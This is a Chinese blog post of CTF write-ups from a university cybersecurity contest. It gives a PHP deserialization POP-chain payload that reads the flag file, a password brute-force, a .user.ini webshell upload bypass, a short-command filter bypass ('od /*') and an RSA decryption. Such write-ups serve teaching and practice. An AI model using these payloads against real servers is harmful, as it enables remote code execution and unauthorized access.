<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="kinsey"><meta name="copyright" content="kinsey"><meta name="generator" content="Hexo 7.2.0"><meta name="theme" content="hexo-theme-yun"><title>武功论剑 | 北歌</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="stylesheet" type="text/css" href="https://fastly.jsdelivr.net/npm/katex@latest/dist/katex.min.css"><script defer src="https://fastly.jsdelivr.net/npm/katex@latest/dist/katex.min.js"></script><link rel="stylesheet" type="text/css" href="https://fastly.jsdelivr.net/npm/katex@latest/dist/contrib/copy-tex.min.css"><script defer src="https://fastly.jsdelivr.net/npm/katex@latest/dist/contrib/copy-tex.min.js"></script><script defer src="https://fastly.jsdelivr.net/npm/katex@latest/dist/contrib/auto-render.min.js"></script><script type="module">import { renderKatex } from '/js/utils.js'
document.addEventListener("DOMContentLoaded", () => {
  renderKatex({
    ...{},
    ...undefined?.options,
  });
});</script><link rel="icon" type="image/svg+xml" href="/yun.svg"><link rel="mask-icon" href="/yun.svg" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"kinseyy.github.io","root":"/","title":"北沐城歌","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}.","hits":"${hits} results found","hits_time":"${hits} results found in ${time} ms"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"algolia":{"appID":"LWKPDLFKV6","apiKey":"6f230e5e2cdf36415bd02b48c1138c08","indexName":"my-hexo-blog","hits":{"per_page":8}},"fireworks":{"colors":null},"waline":{"config":{"enable":true,"serverURL":"https://kinsey-six.vercel.app","comment":true,"visitor":true,"emoji":["https://fastly.jsdelivr.net/gh/walinejs/emojis@latest/bilibili/","https://fastly.jsdelivr.net/gh/walinejs/emojis@latest/weibo/","https://fastly.jsdelivr.net/gh/walinejs/emojis@latest/qq/"],"locale":{"placeholder":"填写邮箱，可以收到回复通知哦～"},"requiredMeta":["nick"],"el":"#waline","lang":"en"},"cdn":"https://fastly.jsdelivr.net/npm/@waline/client@v2/dist/waline.js","dark":"html.dark"},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><link rel="alternate" href="/atom.xml" title="北歌" type="application/atom+xml"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin><script async src="https://www.googletagmanager.com/gtag/js?id=G-1LL0D86CY9"></script><script>if (CONFIG.hostname === location.hostname) {
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'G-1LL0D86CY9');
}</script><script data-ad-client="ca-pub-2245427233262012" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-M9KWR9L');</script><!-- End Google Tag Manager --><script>CONFIG.leancloudVisitors = {"enable":true,"app_id":"S8MhECl1Bg6fZt5ulKgIlajS-MdYXbMMI","app_key":"eLIsYKPJFnSJdwmHLoigqBR4","server_url":"https://s8mhecl1.api.lncldglobal.com"}</script><script defer src="/js/analytics/leancloud-visitors.js" type="module"></script><meta name="description" content="武功山杯·第一届湘赣边大学生网络安全竞赛石能为鼓我们打开页面源码，发现一个文件">
<meta property="og:type" content="article">
<meta property="og:title" content="武功论剑">
<meta property="og:url" content="https://kinseyy.github.io/2024/07/26/%E6%AD%A6%E5%8A%9F%E8%AE%BA%E5%89%91/index.html">
<meta property="og:site_name" content="北歌">
<meta property="og:description" content="武功山杯·第一届湘赣边大学生网络安全竞赛石能为鼓我们打开页面源码，发现一个文件">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407261941434.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281859197.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281920939.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281920117.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281918189.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281921020.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281923829.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281924239.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407282009427.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407282009897.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281930792.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407282010442.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407282011064.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407302028230.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407302034455.png">
<meta property="og:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407302037581.png">
<meta property="article:published_time" content="2024-07-26T10:59:10.000Z">
<meta property="article:modified_time" content="2024-09-24T07:58:09.891Z">
<meta property="article:author" content="kinsey">
<meta property="article:tag" content="题解">
<meta property="article:tag" content="复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407261941434.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="Table of Contents"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="Overview"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="kinsey"><img width="96" loading="lazy" src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202405312004243.jpeg" alt="kinsey"><span class="site-author-status" title="Looking for dawn.">🌑</span></a><div class="site-author-name"><a href="/about/">kinsey</a></div><span class="site-name">北歌</span><sub class="site-subtitle"></sub><div class="site-description"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="Home"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="Archives"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">220</span></a></div><div class="site-state-item"><a href="/categories/" title="Categories"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">7</span></a></div><div class="site-state-item"><a href="/tags/" title="Tags"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">101</span></a></div><a class="site-state-item hty-icon-button" href="/about/#comment" title="留言板"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:clipboard-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="/atom.xml" title="RSS" target="_blank" style="color:orange"><span class="icon iconify" data-icon="ri:rss-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/kinseyy" title="GitHub" target="_blank" style="color:#6e5494"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://music.163.com/#/user/home?id=3954596483" title="网易云音乐" target="_blank" style="color:#C20C0C"><span class="icon iconify" data-icon="ri:netease-cloud-music-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://travellings.link" title="Travelling" target="_blank" style="color:var(--hty-text-color)"><span class="icon iconify" data-icon="ri:train-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a><a class="links-item hty-icon-button" href="/girls/" title="喜欢的女孩子" style="color:hotpink"><span class="icon iconify" data-icon="ri:women-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A6%E5%8A%9F%E5%B1%B1%E6%9D%AF%C2%B7%E7%AC%AC%E4%B8%80%E5%B1%8A%E6%B9%98%E8%B5%A3%E8%BE%B9%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E7%AB%9E%E8%B5%9B"><span class="toc-number">1.</span> <span class="toc-text">武功山杯·第一届湘赣边大学生网络安全竞赛</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9F%B3%E8%83%BD%E4%B8%BA%E9%BC%93"><span class="toc-number">1.1.</span> <span class="toc-text">石能为鼓</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%BE%99%E6%BA%AA%E7%A7%98%E5%A2%83"><span class="toc-number">1.2.</span> <span class="toc-text">龙溪秘境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%BE%99%E6%B1%A0%E5%8F%A4%E5%BA%99"><span class="toc-number">1.3.</span> <span class="toc-text">龙池古庙</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%AD%A6%E5%8A%9F%E8%AE%BA%E5%89%91"><span class="toc-number">1.4.</span> <span class="toc-text">武功论剑</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9C%9F%E5%90%9B%E6%93%92%E9%BE%99"><span class="toc-number">1.5.</span> <span class="toc-text">真君擒龙</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%88%B7%E5%A4%96%E5%A4%A9%E5%A0%82"><span class="toc-number">1.6.</span> <span class="toc-text">户外天堂</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://kinseyy.github.io/2024/07/26/%E6%AD%A6%E5%8A%9F%E8%AE%BA%E5%89%91/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="kinsey"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="北歌"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">武功论剑<a class="post-edit-link" href="https://github.com/kinseyy/kinseyy.github.io/tree/master/2024/05/31/hello-world_posts/武功论剑.md" target="_blank" title="Edit this post" rel="noopener"><span class="icon iconify" data-icon="ri:edit-line"></span></a></h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="Created: 2024-07-26 18:59:10" itemprop="dateCreated datePublished" datetime="2024-07-26T18:59:10+08:00">2024-07-26</time><span class="post-meta-divider">-</span><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-2-line"></span></span> <time title="Modified: 2024-09-24 15:58:09" itemprop="dateModified" datetime="2024-09-24T15:58:09+08:00">2024-09-24</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="Word count in article"><span class="icon iconify" data-icon="ri:file-word-line"></span></span> <span title="Word count in article">859</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="Reading time"><span class="icon iconify" data-icon="ri:timer-line"></span></span> <span title="Reading time">4m</span></span></span><span class="leancloud_visitors" id="/2024/07/26/%E6%AD%A6%E5%8A%9F%E8%AE%BA%E5%89%91/" data-flag-title="武功论剑"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="Views"><span class="icon iconify" data-icon="ri:eye-line"></span> <span class="leancloud-visitors-count"></span></span></span><span class="post-meta-divider">-</span><a href="#comment"><span class="post-meta-item-icon" title="Comments"><span class="icon iconify" data-icon="ri:chat-3-line"></span> <span class="waline-comment-count" id="/2024/07/26/%E6%AD%A6%E5%8A%9F%E8%AE%BA%E5%89%91/"></span></span></a><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E6%AF%94%E8%B5%9B%E5%A4%8D%E7%8E%B0/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">比赛复现</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/%E9%A2%98%E8%A7%A3/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">题解</span></a><a class="tag-item" href="/tags/%E5%A4%8D%E7%8E%B0/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">复现</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h2 id="武功山杯·第一届湘赣边大学生网络安全竞赛"><a href="#武功山杯·第一届湘赣边大学生网络安全竞赛" class="headerlink" title="武功山杯·第一届湘赣边大学生网络安全竞赛"></a>武功山杯·第一届湘赣边大学生网络安全竞赛</h2><h3 id="石能为鼓"><a href="#石能为鼓" class="headerlink" title="石能为鼓"></a>石能为鼓</h3><p>我们打开页面源码，发现一个文件</p>
<span id="more"></span>

<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407261941434.png" alt="image-20240726194119325" loading="lazy"></p>
<p>我们打开，发现一串代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line"></span><br><span class="line">class ping &#123;</span><br><span class="line">    protected $xiang;</span><br><span class="line"></span><br><span class="line">    function __construct() &#123;</span><br><span class="line">        $this-&gt;xiang = new fun();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">        $this-&gt;xiang-&gt;cp();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class fun &#123;</span><br><span class="line">    function cp() &#123;</span><br><span class="line">        echo &quot;hello&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class cup &#123;</span><br><span class="line">    private $data;</span><br><span class="line">    function cp() &#123;</span><br><span class="line">        eval($this-&gt;data);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">unserialize($_GET[&#x27;d&#x27;]);</span><br></pre></td></tr></table></figure>

<p>这道题考的试反序列化，我们构造pop链</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class ping &#123;</span><br><span class="line">    protected $xiang;</span><br><span class="line"></span><br><span class="line">    function __construct() &#123;</span><br><span class="line">        $this-&gt;xiang = new cup();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">        $this-&gt;xiang-&gt;cp();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class fun &#123;</span><br><span class="line">    function cp() &#123;</span><br><span class="line">        echo &quot;hello&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class cup &#123;</span><br><span class="line">    private $data=&#x27;system(&quot;tac /flag&quot;);&#x27;;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">$a=new ping();</span><br><span class="line">echo urlencode(serialize($a));</span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?d=O%3A4%3A%22ping%22%3A1%3A%7Bs%3A8%3A%22%00%2A%00xiang%22%3BO%3A3%3A%22cup%22%3A1%3A%7Bs%3A9%3A%22%00cup%00data%22%3Bs%3A20%3A%22system%28%22tac+%2Fflag%22%29%3B%22%3B%7D%7D</span><br></pre></td></tr></table></figure>



<h3 id="龙溪秘境"><a href="#龙溪秘境" class="headerlink" title="龙溪秘境"></a>龙溪秘境</h3><p>我们访问hint，可知这题需要进行爆破</p>
<p>我们查看网页源码，可以发现密码进行了base64加密</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281859197.png" alt="image-20240728185857109" loading="lazy"></p>
<p>因此，我们进行爆破的时候，需要将密码进行base64加密</p>
<p>我们选择集装束爆破</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281920939.png" alt="image-20240728192018900" loading="lazy"></p>
<p>我们在第一个位置加载常用用户名字典</p>
<p>在第二个位置加载常用密码，并将编码类型选择为base64加密</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281920117.png" alt="image-20240728192049079" loading="lazy"></p>
<p>开始爆破</p>
<p>我们发现用户名为test，密码为admin时的输出长度不同</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281918189.png" alt="image-20240728191850146" loading="lazy"></p>
<p>我们登录试试</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281921020.png" alt="image-20240728192145724" loading="lazy"></p>
<p>提示密码错误，说明用户名正确，我们就只需要爆破密码就行了</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281923829.png" alt="image-20240728192319754" loading="lazy"></p>
<p>当密码为654321时输出不同，说明可能是正确密码我们登录</p>
<p>登录成功，获得flag</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281924239.png" alt="image-20240728192408870" loading="lazy"></p>
<h3 id="龙池古庙"><a href="#龙池古庙" class="headerlink" title="龙池古庙"></a>龙池古庙</h3><p>我们访问hint，提示这题需要传.use.ini文件</p>
<p>我们包含自身（一句话木马）</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407282009427.png" alt="image-20240728200906341" loading="lazy"></p>
<p>我们先上传.use.ini，但提示不被允许，我们抓包修改类型</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407282009897.png" alt="image-20240728200939872" loading="lazy">		上传成功</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407281930792.png" alt="image-20240728193023687" loading="lazy"></p>
<p>成功包含</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407282010442.png" alt="image-20240728201001414" loading="lazy"></p>
<p>我们连接蚁剑，找到flag</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407282011064.png" alt="image-20240728201111045" loading="lazy"></p>
<h3 id="武功论剑"><a href="#武功论剑" class="headerlink" title="武功论剑"></a>武功论剑</h3><h3 id="真君擒龙"><a href="#真君擒龙" class="headerlink" title="真君擒龙"></a>真君擒龙</h3><p>打开页面，审计代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">$cmd=$_GET[&#x27;cmd&#x27;];</span><br><span class="line">if(isset($cmd)&amp;&amp;strlen($cmd)&lt;6&amp;&amp;!strpos(strtolower($cmd), &#x27;nl&#x27;))&#123;</span><br><span class="line">    system($cmd);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">  die(&quot;no!no!no!&quot;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们需要通过命令执行获取flag，由于限制了cmd的长度，根据提示，我们使用od进行绕过</p>
<p>od:以二进制的方式读取档案内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=od /*</span><br></pre></td></tr></table></figure>

<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407302028230.png" alt="image-20240730202818091" loading="lazy"></p>
<p>获得了一大串八进制字符串，我们将八进制字符串转换为二进制字节输出</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a=&quot;0000000 066146 063541 031573 033064 032541 033546 026544 033470 0000020 030544 032055 032071 026466 034470 062066 061055 030062 0000040 032064 033066 030146 032067 076541 000012 0000053&quot;</span><br><span class="line">print(b&#x27;&#x27;.join(int(ss, 8).to_bytes(2, &#x27;little&#x27;) for ss in a.split()))</span><br></pre></td></tr></table></figure>

<p>得到flag</p>
<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407302034455.png" alt="image-20240730203417419" loading="lazy"></p>
<p>此外，我们也可以用n*绕过nl</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cmd=n* /*</span><br></pre></td></tr></table></figure>

<p><img src="https://insey.oss-cn-shenzhen.aliyuncs.com/kin/202407302037581.png" alt="image-20240730203727557" loading="lazy"></p>
<h3 id="户外天堂"><a href="#户外天堂" class="headerlink" title="户外天堂"></a>户外天堂</h3><p>根据提示，我们需要进行维吉纳亚解密，然后再进行base64解密</p>
<p>写脚本</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">from Crypto.Util.number import *</span><br><span class="line">from base64 import *</span><br><span class="line">from gmpy2 import *</span><br><span class="line">def key_extend(key,length):</span><br><span class="line">    Key = key * (length // len(key) + 1)</span><br><span class="line">    return Key[:length]</span><br><span class="line">def encrypt(message,table,key):</span><br><span class="line">    enc=&#x27;&#x27;</span><br><span class="line">    Key=key_extend(key,len(message))</span><br><span class="line">    for i in range(len(message)):</span><br><span class="line">        if message[i] not in table:</span><br><span class="line">            enc += message[i]</span><br><span class="line">            continue</span><br><span class="line">        enc+=table[(table.index(message[i])+table.index(Key[i]))%len(table)]</span><br><span class="line">    return enc</span><br><span class="line">message=&#x27;kr0gMDY1NTY5MDghNTU5MsozMhU5MzUgNiM3NTI0ODI5MsA2MrE3CmU9NsU1MhcKYz01NTkyOTk4MDM2Mio3Mrg0OTYfODE0OTcfNjUhMiA0MhUiODM=&#x27;</span><br><span class="line">table=&#x27;abcdefghijklmnopqrstuvwxyz&#x27;</span><br><span class="line">key = &#x27;rsa&#x27;</span><br><span class="line">print(b64decode(encrypt(message,table,key).encode()).decode()).</span><br><span class="line"></span><br><span class="line">n=1065569082559283359352737524829206217</span><br><span class="line">e=65537</span><br><span class="line">c=557299803638728496181497065330435383</span><br></pre></td></tr></table></figure>

<p>然后继续rsa解密</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">from gmpy2 import*</span><br><span class="line">from libnum import n2s</span><br><span class="line">p=1007395600713969067</span><br><span class="line">q=1057746412436271451</span><br><span class="line">e=65537</span><br><span class="line">c=557299803638728496181497065330435383</span><br><span class="line">n=1065569082559283359352737524829206217</span><br><span class="line">phi=(p-1)*(q-1)</span><br><span class="line">d=invert(e,phi)</span><br><span class="line">m=pow(c,d,n)</span><br><span class="line">print(n2s(int(m)))</span><br><span class="line"></span><br><span class="line">//b&#x27;flag&#123;DraG0o0n&#125;&#x27;</span><br></pre></td></tr></table></figure>

